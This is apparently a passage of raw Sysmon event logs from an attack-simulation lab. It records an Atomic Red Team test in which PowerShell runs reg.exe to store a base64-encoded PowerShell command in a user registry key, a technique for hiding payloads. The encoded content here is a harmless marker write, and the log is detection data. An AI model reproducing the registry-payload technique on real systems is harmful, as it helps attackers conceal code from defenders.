16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a3000|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000002245627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a2ae1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.640{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF14b13bfa.TMPMD5=447276F599C30177A0EA9A030C30E4DB,SHA256=DE114614183613CEDB27E92C354B8C848839AA92A117B7A9EF86F646C68FF426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.624{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE454CA2AB3CA5A157508CC09A4267AF,SHA256=3CA8C54223D6F2729F33EFA8050680C73FAEDC0CF93DE6B6F93C3BE38E872919,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.585{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\9unhrnfd.default-release\datareporting\aborted-session-pingMD5=90E7CFCFF7E654BFF939A63505B575C1,SHA256=1DD9FBCB6C1D104AB35912CB48D00F9D7C560BD2CCF3D0D1F1627C1AFD6E0B8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.488{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F66F1534BE49E1166CB0A785135B9426,SHA256=1164EA370FD62BA2ADCB88B12D6E1709FE605E5F7DD3E13445081DF7E87A4713,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.968{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6EB6-603E-16AB-00000000AD01}5692C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.952{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.952{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.952{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.952{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.952{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6EB6-603E-16AB-00000000AD01}5692C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.952{05ADC7E1-6EB6-603E-15AB-00000000AD01}667611708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6EB6-603E-16AB-00000000AD01}5692C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+ba4d9b1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997a9a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997a676|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+ba42bcdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b993b20c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b99996db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997cd40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997cd40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997cbd1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b996eb56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997b089|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997ac25|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997a9a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b997a676|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+ba42bcdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b993b20c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+b99996db 154100x80000000000000002247055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.964{05ADC7E1-6EB6-603E-16AB-00000000AD01}5692C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam /v ART /t REG_SZ /d U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Encoded payload in next command is the following \""Set-Content -path 